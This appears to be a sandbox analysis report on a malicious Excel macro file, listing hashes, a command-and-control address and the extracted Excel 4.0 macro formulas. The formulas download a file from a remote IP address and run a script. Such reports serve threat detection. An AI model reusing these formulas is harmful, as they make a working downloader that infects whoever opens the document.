Overview

overview

10

Static

static

10

759e7fafac...d.xlsm

windows7-x64

10

759e7fafac...d.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    759e7fafac9401e6275ef618e949cc1d

  • Size

    6KB

  • MD5

    759e7fafac9401e6275ef618e949cc1d

  • SHA1

    0d651af258079a3126313020fed21649cc37d76c

  • SHA256

    485d46aa4d32efe9414d5009c3acc7e4d0935a2718b0a3833d0b12b914bbe5ca

  • SHA512

    b022a07a2d3eb553f4c7f29fa2a2e0b4adee033c844833ed4cfa7b2d541601366807a77013aa70f6a1240566063c995c5cae714a34d0b7e759d0402977a2824c

  • SSDEEP

    192:NDSluSnbrA2OmmfRO8UhHFBFYuIb98yMQ7T+EG0:NyuUM2wM1FYtb98yMQ75

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • 759e7fafac9401e6275ef618e949cc1d
    .xlsm office2007